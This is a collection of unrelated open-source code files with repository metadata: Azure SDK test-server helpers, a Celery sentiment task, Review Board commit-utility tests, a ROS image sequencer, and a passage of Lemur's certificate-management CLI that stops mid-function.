if protocol is None and request.headers.get('X-Forwarded-Ssl') == 'on':
protocol = 'https'
if protocol is None:
return request.url
url = list(urlparse(request.url))
url[0] = protocol
return urlunparse(url)
def get_files():
"""Returns files dict from request context."""
files = dict()
for k, v in request.files.items():
content_type = request.files[k].content_type or 'application/octet-stream'
val = json_safe(v.read(), content_type)
if files.get(k):
if not isinstance(files[k], list):
files[k] = [files[k]]
files[k].append(val)
else:
files[k] = val
return files
def get_headers(hide_env=True):
"""Returns headers dict from request context."""
headers = dict(request.headers.items())
if hide_env and ('show_env' not in request.args):
for key in ENV_HEADERS:
try:
del headers[key]
except KeyError:
pass
return CaseInsensitiveDict(headers.items())
def semiflatten(multi):
"""Convert a MultiDict into a regular dict. If there are more than one value
for a key, the result will have a list of values for the key. Otherwise it
will have the plain value."""
if multi:
result = multi.to_dict(flat=False)
for k, v in result.items():
if len(v) == 1:
result[k] = v[0]
return result
else:
return multi
def json_safe(string, content_type='application/octet-stream'):
"""Returns JSON-safe version of `string`.
If `string` is a Unicode string or a valid UTF-8, it is returned unmodified,
as it can safely be encoded to JSON string.
If `string` contains raw/binary data, it is Base64-encoded, formatted and
returned according to "data" URL scheme (RFC2397). Since JSON is not
suitable for binary data, some additional encoding was necessary; "data"
URL scheme was chosen for its simplicity.
"""
try:
string = string.decode('utf-8')
json.dumps(string)
return string
except (ValueError, TypeError):
return b''.join([
b'data:',
content_type.encode('utf-8'),
b';base64,',
base64.b64encode(string)
]).decode('utf-8')
def get_dict(*keys, **extras):
"""Returns request dict of given keys."""
_keys = ('url', 'args', 'form', 'data', 'origin', 'headers', 'files', 'json', 'method')
assert all(map(_keys.__contains__, keys))
data = request.data
form = semiflatten(request.form)
try:
_json = json.loads(data.decode('utf-8'))
except (ValueError, TypeError):
_json = None
d = dict(
url=get_url(request),
args=semiflatten(request.args),
form=form,
data=json_safe(data),
origin=request.headers.get('X-Forwarded-For', request.remote_addr),
headers=get_headers(),
files=get_files(),
json=_json,
method=request.method,
)
out_d = dict()
for key in keys:
out_d[key] = d.get(key)
out_d.update(extras)
return out_d
def get_base_url(request):
return "http://" + request.host
__all__ = ["assert_with_message",
"get_dict",
"jsonify"]
|
{
"content_hash": "45c259deaf6da0d3a6512af559c44d21",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 102,
"avg_line_length": 28.48447204968944,
"alnum_prop": 0.6033580462276493,
"repo_name": "Azure/azure-sdk-for-python",
"id": "132fb6874b63c6cd6e034847eb3156aeb0a9d369",
"size": "4895",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/core/azure-core/tests/testserver_tests/coretestserver/coretestserver/test_routes/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
from celery import Celery
from textblob import TextBlob
app = Celery('tasks', backend='amqp', broker='amqp://guest@localhost//')
@app.task
def sentiment(row):
blob = TextBlob(row[3]) # tweet text
return row[0], blob.sentiment.polarity
|
{
"content_hash": "ee1e534b66ba4cd95e7f5d38b90b2fb7",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 72,
"avg_line_length": 22.545454545454547,
"alnum_prop": 0.7056451612903226,
"repo_name": "Nozdi/movies-popularity",
"id": "bc40cabf9be68f8e1cb0b43faadb8ee59da870fa",
"size": "248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10135"
},
{
"name": "Shell",
"bytes": "190"
}
],
"symlink_target": ""
}
|
"""Unit tests for reviewboard.diffviewer.commit_utils."""
from __future__ import unicode_literals
from django.utils import six
from kgb import SpyAgency
from reviewboard.diffviewer.commit_utils import (CommitHistoryDiffEntry,
diff_histories,
exclude_ancestor_filediffs,
get_base_and_tip_commits,
get_file_exists_in_history)
from reviewboard.diffviewer.models import DiffCommit
from reviewboard.diffviewer.tests.test_diffutils import \
BaseFileDiffAncestorTests
from reviewboard.scmtools.core import UNKNOWN
from reviewboard.testing.testcase import TestCase
class GetFileExistsInHistoryTests(SpyAgency, TestCase):
"""Unit tests for get_file_exists_in_history."""
fixtures = ['test_scmtools']
def test_added_in_parent_with_revision(self):
"""Testing get_file_exists_in_history for a file added in the parent
commit for an SCM that uses file revisions
"""
repository = self.create_repository()
validation_info = {
'r1': {
'parent_id': 'r0',
'tree': {
'added': [{
'filename': 'foo',
'revision': 'a' * 40,
}],
'modified': [],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision='a' * 40))
def test_added_in_parent_without_revision(self):
"""Testing get_file_exists_in_history for a file added in the parent
commit for an SCM that doesn't use file revisions
"""
repository = self.create_repository(tool_name='Mercurial')
validation_info = {
'r1': {
'parent_id': 'r0',
'tree': {
'added': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
'modified': [],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision=UNKNOWN))
def test_added_in_grandparent_with_revision(self):
"""Testing get_file_exists_in_history for a file added in a
grandparent commit for an SCM that uses file revisions
"""
repository = self.create_repository()
validation_info = {
'r2': {
'parent_id': 'r1',
'tree': {
'added': [],
'modified': [],
'removed': [],
},
},
'r1': {
'parent_id': 'r0',
'tree': {
'added': [{
'filename': 'foo',
'revision': 'a' * 40,
}],
'modified': [],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r2',
path='foo',
revision='a' * 40))
def test_added_in_grandparent_without_revision(self):
"""Testing get_file_exists_in_history for a file added in a
grandparent commit for an SCM that doesn't use file revisions
"""
repository = self.create_repository(tool_name='Mercurial')
validation_info = {
'r2': {
'parent_id': 'r1',
'tree': {
'added': [],
'modified': [],
'removed': [],
},
},
'r1': {
'parent_id': 'r0',
'tree': {
'added': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
'modified': [],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r2',
path='foo',
revision=UNKNOWN))
def test_removed_in_parent_without_revision(self):
"""Testing get_file_exists_in_history for a file removed in a parent
revision for an SCM that uses file revisions
"""
repository = self.create_repository()
target_path = 'foo'
target_revision = 'a' * 40
self.spy_on(
repository.get_file_exists,
call_fake=self._make_get_file_exists_in_history(target_path,
target_revision))
validation_info = {
'r1': {
'parent_id': 'r0',
'tree': {
'added': [],
'modified': [],
'removed': [{
'filename': target_path,
'revision': target_revision,
}],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path=target_path,
revision=target_revision))
self.assertTrue(repository.get_file_exists.spy.called_with(
target_path, target_revision))
def test_removed_in_parent_unknown_revision(self):
"""Testing get_file_exists_in_history for a file removed in a parent
commit for an SCM that does not use file revisions
"""
repository = self.create_repository(tool_name='Mercurial')
validation_info = {
'r1': {
'parent_id': 'r0',
'tree': {
'added': [],
'modified': [],
'removed': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
},
},
}
self.assertFalse(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision=UNKNOWN))
def test_removed_readded_in_parent_unknown_revision(self):
"""Testing get_file_exists_in_history for a file removed and re-added
in parent commits for an SCM that does not use file revisions
"""
repository = self.create_repository(tool_name='Mercurial')
validation_info = {
'r2': {
'parent_id': 'r1',
'tree': {
'added': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
'modified': [],
'removed': [],
},
},
'r1': {
'parent_id': 'r0',
'tree': {
'added': [],
'modified': [],
'removed': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
},
},
}
self.assertFalse(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision=UNKNOWN))
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r2',
path='foo',
revision=UNKNOWN))
def test_modified_in_parent_with_revision(self):
"""Testing get_file_exists_in_history for a file modified in a
parent revision for an SCM that uses file revisions
"""
repository = self.create_repository()
self.spy_on(
repository.get_file_exists,
call_fake=self._make_get_file_exists_in_history('foo', 'a' * 40))
validation_info = {
'r2': {
'parent_id': 'r1',
'tree': {
'added': [],
'modified': [{
'filename': 'foo',
'revision': 'c' * 40,
}],
'removed': [],
},
},
'r1': {
'parent_id': 'r0',
'tree': {
'added': [],
'modified': [{
'filename': 'foo',
'revision': 'b' * 40,
}],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r2',
path='foo',
revision='c' * 40))
self.assertFalse(repository.get_file_exists.spy.called)
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision='b' * 40))
self.assertFalse(repository.get_file_exists.spy.called)
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r0',
path='foo',
revision='a' * 40))
self.assertTrue(repository.get_file_exists.spy.called_with(
'foo', 'a' * 40,
))
def test_modified_in_parent_unknown_revision(self):
"""Testing get_file_exists_in_history for a file modified in a
parent revision for an SCM that does not use file revision
"""
repository = self.create_repository(tool_name='Mercurial')
self.spy_on(
repository.get_file_exists,
call_fake=self._make_get_file_exists_in_history('foo', UNKNOWN))
validation_info = {
'r2': {
'parent_id': 'r1',
'tree': {
'added': [],
'modified': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
'removed': [],
},
},
'r1': {
'parent_id': 'r0',
'tree': {
'added': [],
'modified': [{
'filename': 'foo',
'revision': UNKNOWN,
}],
'removed': [],
},
},
}
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r2',
path='foo',
revision=UNKNOWN))
self.assertFalse(repository.get_file_exists.spy.called)
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r1',
path='foo',
revision=UNKNOWN))
self.assertFalse(repository.get_file_exists.spy.called)
self.assertTrue(get_file_exists_in_history(
validation_info=validation_info,
repository=repository,
parent_id='r0',
path='foo',
revision=UNKNOWN))
self.assertTrue(repository.get_file_exists.spy.called_with(
'foo', UNKNOWN))
def _make_get_file_exists_in_history(self, target_path, target_revision):
"""Return a fake get_file_exists_in_history method for a repository.
Args:
target_path (unicode):
The path that should report as existing in the repository.
target_revision (unicode):
The revision of the file.
Returns:
callable:
A function that only returns True when called with the given
``target_path`` and ``target_revision``.
"""
def get_file_exists_in_history(repository, path, revision, *args,
**kwargs):
return path == target_path and revision == target_revision
return get_file_exists_in_history
class ExcludeAncestorFileDiffsTests(BaseFileDiffAncestorTests):
"""Unit tests for commit_utils.exclude_ancestor_filediffs."""
def setUp(self):
super(ExcludeAncestorFileDiffsTests, self).setUp()
self.set_up_filediffs()
def test_exclude(self):
"""Testing exclude_ancestor_filediffs"""
self._test_excluded(exclude_ancestor_filediffs(self.filediffs))
def test_exclude_query_count(self):
"""Testing exclude_ancestor_filediffs query count"""
num_queries = len(self.filediffs)
with self.assertNumQueries(num_queries):
result = exclude_ancestor_filediffs(self.filediffs)
self._test_excluded(result)
def test_exclude_query_count_precomputed(self):
"""Testing exclude_ancestor_filediffs query count when the ancestors
are pre-computed
"""
for filediff in self.filediffs:
filediff.get_ancestors(minimal=False, filediffs=self.filediffs)
with self.assertNumQueries(0):
result = exclude_ancestor_filediffs(self.filediffs)
self._test_excluded(result)
def _test_excluded(self, result):
"""Test that the given set of FileDiffs matches the expected results.
Args:
result (list of reviewboard.diffviewer.models.filediff.FileDiff):
The FileDiffs that were returned from :py:func:`~reviewboard.
diffviewer.commit_utils.exclude_ancestor_filediffs`.
Raises:
AssertionError:
The FileDiffs do not match the expected results.
"""
by_details = {
(
filediff.commit_id,
filediff.source_file,
filediff.source_revision,
filediff.dest_file,
filediff.dest_detail,
): filediff
for filediff in self.filediffs
}
expected = {
by_details[details]
for details in (
(2, 'baz', '7601807', 'baz', '280beb2'),
(3, 'foo', '257cc56', 'qux', '03b37a0'),
(3, 'corge', 'e69de29', 'corge', 'f248ba3'),
(4, 'bar', '5716ca5', 'quux', 'e69de29'),
)
}
self.assertEqual(expected, set(result))
class DiffHistoriesTests(TestCase):
"""Unit tests for reviewboard.diffviewer.commit_utils.diff_histories."""
def test_diff_histories_identical(self):
"""Testing diff_histories with identical histories"""
new_history = old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[0],
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[1],
new_commit=new_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[2],
new_commit=new_history[2]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_added(self):
"""Testing diff_histories with a new history that adds commits at the
end of the history
"""
old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
]
new_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[0],
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[1],
new_commit=new_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[2]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_removed(self):
"""Testing diff_histories with a new history that removes commits"""
old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
new_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[0],
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[1],
new_commit=new_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[2]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_added_start(self):
"""Testing diff_histories with a new history that adds commits at the
start of the history
"""
old_history = [
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
new_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[2]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_removed_start(self):
"""Testing diff_histories with a new history that removes commits at
the start of the history
"""
old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
new_history = [
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[2]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[1]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_addedd_middle(self):
"""Testing diff_histories with a new history that adds commits in the
middle of the history
"""
old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r2'),
]
new_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[0],
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[2]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
def test_diff_histories_removed_middle(self):
"""Testing diff_histories with a new history that removes commits in
the middle of the history
"""
old_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r1'),
DiffCommit(commit_id='r2'),
]
new_history = [
DiffCommit(commit_id='r0'),
DiffCommit(commit_id='r2'),
]
expected_result = [
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
old_commit=old_history[0],
new_commit=new_history[0]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[1]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
old_commit=old_history[2]),
CommitHistoryDiffEntry(
entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
new_commit=new_history[1]),
]
self.assertEqual(list(diff_histories(old_history, new_history)),
expected_result)
class GetBaseAndTipCommitsTests(TestCase):
"""Unit tests for commit_utils.get_base_and_tip_commits."""
fixtures = ['test_scmtools']
def setUp(self):
super(GetBaseAndTipCommitsTests, self).setUp()
self.repository = self.create_repository(tool_name='Git')
self.diffset = self.create_diffset(repository=self.repository)
self.commits = {
commit.pk: commit
for commit in (
self.create_diffcommit(diffset=self.diffset, **kwargs)
for kwargs in (
{'commit_id': 'r1', 'parent_id': 'r0'},
{'commit_id': 'r2', 'parent_id': 'r1'},
{'commit_id': 'r3', 'parent_id': 'r2'},
{'commit_id': 'r4', 'parent_id': 'r3'},
{'commit_id': 'r5', 'parent_id': 'r4'},
{'commit_id': 'r6', 'parent_id': 'r5'},
)
)
}
def test_get_base_and_tip_commits_no_commits_no_diffset(self):
"""Testing get_base_and_tip_commits with no commits and no diffset
raises ValueError
"""
with self.assertRaises(ValueError):
get_base_and_tip_commits(base_commit_id=1,
tip_commit_id=5)
def test_get_base_and_tip_commits_commits_no_diffset(self):
"""Testing get_base_and_tip_commits with commits and no diffset"""
with self.assertNumQueries(0):
base, tip = get_base_and_tip_commits(
base_commit_id=1,
tip_commit_id=5,
commits=[
commit
for commit in six.itervalues(self.commits)
])
self.assertEqual(self.commits[1], base)
self.assertEqual(self.commits[5], tip)
def test_get_base_and_tip_commits_no_commits_diffset(self):
"""Testing get_base_and_tip_commits with a diffset and no commits"""
with self.assertNumQueries(1):
base, tip = get_base_and_tip_commits(
base_commit_id=1,
tip_commit_id=5,
diffset=self.diffset)
self.assertEqual(self.commits[1], base)
self.assertEqual(self.commits[5], tip)
def test_get_base_and_tip_commits_with_commits_invalid_commit_id(self):
"""Testing get_base_and_tip_commits with commits and an invalid commit
ID
"""
base, tip = get_base_and_tip_commits(
base_commit_id=7,
tip_commit_id=5000,
commits=[
commit
for commit in six.itervalues(self.commits)
])
self.assertIsNone(base)
self.assertIsNone(tip)
def test_get_base_and_tip_commits_with_diffset_invalid_commit_id(self):
"""Testing get_base_and_tip_commits with commits and an invalid commit
ID
"""
other_diffset = self.create_diffset(repository=self.repository)
other_commits = [
self.create_diffcommit(diffset=other_diffset, **kwargs)
for kwargs in (
{'commit_id': 'r1', 'parent_id': 'r0'},
{'commit_id': 'r2', 'parent_id': 'r1'},
)
]
base, tip = get_base_and_tip_commits(
base_commit_id=other_commits[0].pk,
tip_commit_id=other_commits[1].pk,
diffset=self.diffset)
self.assertIsNone(base)
self.assertIsNone(tip)
def test_get_base_and_tip_commits_only_base(self):
"""Testing get_base_and_tip_commits with only base_commit_id"""
base, tip = get_base_and_tip_commits(
base_commit_id=3,
tip_commit_id=None,
diffset=self.diffset)
self.assertEqual(self.commits[3], base)
self.assertIsNone(tip)
def test_get_base_and_tip_commits_only_tip(self):
"""Testing get_base_and_tip_commits with only tip_commit_id"""
base, tip = get_base_and_tip_commits(
base_commit_id=None,
tip_commit_id=3,
diffset=self.diffset)
self.assertIsNone(base)
self.assertEqual(self.commits[3], tip)
|
{
"content_hash": "f318f3c38a134d2dbfc7da268869b9b8",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 78,
"avg_line_length": 34.40717821782178,
"alnum_prop": 0.5060969029891011,
"repo_name": "chipx86/reviewboard",
"id": "42c33567571b6f531d9a75618f5fe80c4759e84a",
"size": "27801",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reviewboard/diffviewer/tests/test_commit_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "434719"
},
{
"name": "HTML",
"bytes": "224310"
},
{
"name": "JavaScript",
"bytes": "3830753"
},
{
"name": "Python",
"bytes": "7333453"
},
{
"name": "Shell",
"bytes": "777"
}
],
"symlink_target": ""
}
|
import os
import cv2
import rospy
import actionlib
from cv_bridge import CvBridge
from camera_control_msgs.msg import GrabSequenceAction, GrabSequenceResult
__author__ = 'nikolas'
server = None
bridge = CvBridge()
def load_folder(folder):
file_list = os.listdir(folder)
print file_list
file_map_ = dict()
for f in file_list:
try:
s = int(f.split("_")[-1].split('.')[0]) # ???_number.??? -> number
except ValueError as e:
rospy.logerr("Invalid filename "+f+str(e))
continue
file_map_[s] = folder+"/"+f
return file_map_
def select_images(file_map_, req_list):
# select each image seperately (could lead to double images in result)
res = GrabSequenceResult()
res.exposureTimes = []
res.images = [] #
for t in sorted(file_map_.keys()):
print t,
print
for t in req_list:
print t,
best_exp = min(file_map_.keys(), key=lambda x: abs(x-t))
res.exposureTimes.append(best_exp)
best_file = file_map_[best_exp]
# create sensor_msgs/Image from files
print best_file
img = cv2.imread(best_file, 0)
as_sensor_msg = bridge.cv2_to_imgmsg(img, "mono8")
res.images.append(as_sensor_msg)
res.success = True
return res
def grab_sequence_callback(goal):
folder = "/home/nikolas/Documents/sequence_test"
# folder = rospy.get_param("~data_folder")
if not os.path.isdir(folder):
rospy.logerr("'"+folder+"' is no directory")
res = GrabSequenceResult()
res.success = False
server.set_succeeded(res)
return
file_map = load_folder(folder)
print file_map
res = select_images(file_map, goal.desiredExposureTimes)
server.set_succeeded(res)
if __name__ == "__main__":
rospy.init_node("image_file_sequencer")
server = actionlib.SimpleActionServer("/image_file_sequencer", GrabSequenceAction,
execute_cb=grab_sequence_callback, auto_start=False)
server.start()
rospy.spin()
|
{
"content_hash": "5fe5fabe2ab72004907be1168f88f179",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 94,
"avg_line_length": 25.728395061728396,
"alnum_prop": 0.6113243761996161,
"repo_name": "suzlab/Autoware",
"id": "3a7256925c6d7621766c2c0fd5a7d85fb5da4793",
"size": "2130",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ros/src/sensing/drivers/camera/packages/pylon_camera/pylon_camera/scripts/file_sequencer.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1500382"
},
{
"name": "C++",
"bytes": "7522176"
},
{
"name": "CMake",
"bytes": "292891"
},
{
"name": "CSS",
"bytes": "22550"
},
{
"name": "Cuda",
"bytes": "281867"
},
{
"name": "GDB",
"bytes": "23"
},
{
"name": "HTML",
"bytes": "42329"
},
{
"name": "Java",
"bytes": "539698"
},
{
"name": "JavaScript",
"bytes": "215453"
},
{
"name": "Makefile",
"bytes": "19653"
},
{
"name": "Matlab",
"bytes": "20217"
},
{
"name": "Prolog",
"bytes": "1723"
},
{
"name": "Python",
"bytes": "840645"
},
{
"name": "QMake",
"bytes": "12635"
},
{
"name": "Shell",
"bytes": "24900"
}
],
"symlink_target": ""
}
|
"""
.. module: lemur.certificate.cli
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
import arrow
import sys
from flask import current_app
from flask_principal import Identity, identity_changed
from flask_script import Manager
from sqlalchemy import or_
from tabulate import tabulate
from time import sleep
from sentry_sdk import capture_exception
from lemur import database
from lemur.authorities.models import Authority
from lemur.authorities.service import get as authorities_get_by_id
from lemur.authorities.service import get_by_name as get_authority_by_name
from lemur.certificates.models import Certificate
from lemur.certificates.schemas import CertificateOutputSchema
from lemur.certificates.service import (
reissue_certificate,
get_certificate_primitives,
get_all_pending_reissue,
get_by_name,
get_all_valid_certs,
get,
get_all_certs_attached_to_endpoint_without_autorotate,
get_all_certs_attached_to_destination_without_autorotate,
revoke as revoke_certificate,
list_duplicate_certs_by_authority,
get_certificates_with_same_prefix_with_rotate_on,
identify_and_persist_expiring_deployed_certificates,
send_certificate_expiration_metrics
)
from lemur.certificates.verify import verify_string
from lemur.constants import SUCCESS_METRIC_STATUS, FAILURE_METRIC_STATUS, CRLReason
from lemur.deployment import service as deployment_service
from lemur.domains.models import Domain
from lemur.endpoints import service as endpoint_service
from lemur.extensions import metrics
from lemur.notifications.messaging import send_rotation_notification, send_reissue_no_endpoints_notification, \
send_reissue_failed_notification
from lemur.plugins.base import plugins
from sqlalchemy.orm.exc import MultipleResultsFound
manager = Manager(usage="Handles all certificate related tasks.")
def print_certificate_details(details):
"""
Print the certificate details with formatting.
:param details:
:return:
"""
details, errors = CertificateOutputSchema().dump(details)
print("[+] Re-issuing certificate with the following details: ")
print(
"\t[+] Common Name: {common_name}\n"
"\t[+] Subject Alternate Names: {sans}\n"
"\t[+] Authority: {authority_name}\n"
"\t[+] Validity Start: {validity_start}\n"
"\t[+] Validity End: {validity_end}\n".format(
common_name=details["commonName"],
sans=",".join(
x["value"] for x in details["extensions"]["subAltNames"]["names"]
)
or None,
authority_name=details["authority"]["name"],
validity_start=details["validityStart"],
validity_end=details["validityEnd"],
)
)
def validate_certificate(certificate_name):
"""
Ensuring that the specified certificate exists.
:param certificate_name:
:return:
"""
if certificate_name:
cert = get_by_name(certificate_name)
if not cert:
print("[-] No certificate found with name: {0}".format(certificate_name))
sys.exit(1)
return cert
def validate_endpoint(endpoint_name):
"""
Ensuring that the specified endpoint exists.
:param endpoint_name:
:return:
"""
if endpoint_name:
endpoint = endpoint_service.get_by_name(endpoint_name)
if not endpoint:
print("[-] No endpoint found with name: {0}".format(endpoint_name))
sys.exit(1)
return endpoint
def validate_endpoint_from_source(endpoint_name, source):
"""
Ensuring that the specified endpoint from the given source exists.
:param endpoint_name:
:param source:
:return:
"""
if endpoint_name and source:
endpoint = endpoint_service.get_by_name_and_source(endpoint_name, source)
if not endpoint:
print("[-] No endpoint found from source {0} with name: {1}".format(source, endpoint_name))
sys.exit(1)
return endpoint
def request_rotation(endpoint, certificate, message, commit):
"""
Rotates a certificate and handles any exceptions during
execution.
:param endpoint:
:param certificate:
:param message:
:param commit:
:return:
"""
status = FAILURE_METRIC_STATUS
if commit:
try:
deployment_service.rotate_certificate(endpoint, certificate)
if message:
send_rotation_notification(certificate)
status = SUCCESS_METRIC_STATUS
except Exception as e:
capture_exception(extra={"certificate_name": str(certificate.name),
"endpoint": str(endpoint.dnsname)})
current_app.logger.exception(
f"Error rotating certificate: {certificate.name}", exc_info=True
)
print(
"[!] Failed to rotate endpoint {0} to certificate {1} reason: {2}".format(
endpoint.name, certificate.name, e
)
)
metrics.send("endpoint_rotation", "counter", 1, metric_tags={"status": status,
"certificate_name": str(certificate.name),
"endpoint": str(endpoint.dnsname)})
def request_reissue(certificate, notify, commit):
"""
Reissuing certificate and handles any exceptions.
:param certificate:
:param notify:
:param commit:
:return:
"""
status = FAILURE_METRIC_STATUS
notify = notify and certificate.notify
try:
print("[+] {0} is eligible for re-issuance".format(certificate.name))
# set the lemur identity for all cli commands
identity_changed.send(current_app._get_current_object(), identity=Identity(1))
details = get_certificate_primitives(certificate)
print_certificate_details(details)
if commit:
new_cert = reissue_certificate(certificate, notify=notify, replace=True)
print("[+] New certificate named: {0}".format(new_cert.name))
if notify and isinstance(new_cert, Certificate): # let celery handle PendingCertificates
send_reissue_no_endpoints_notification(certificate, new_cert)
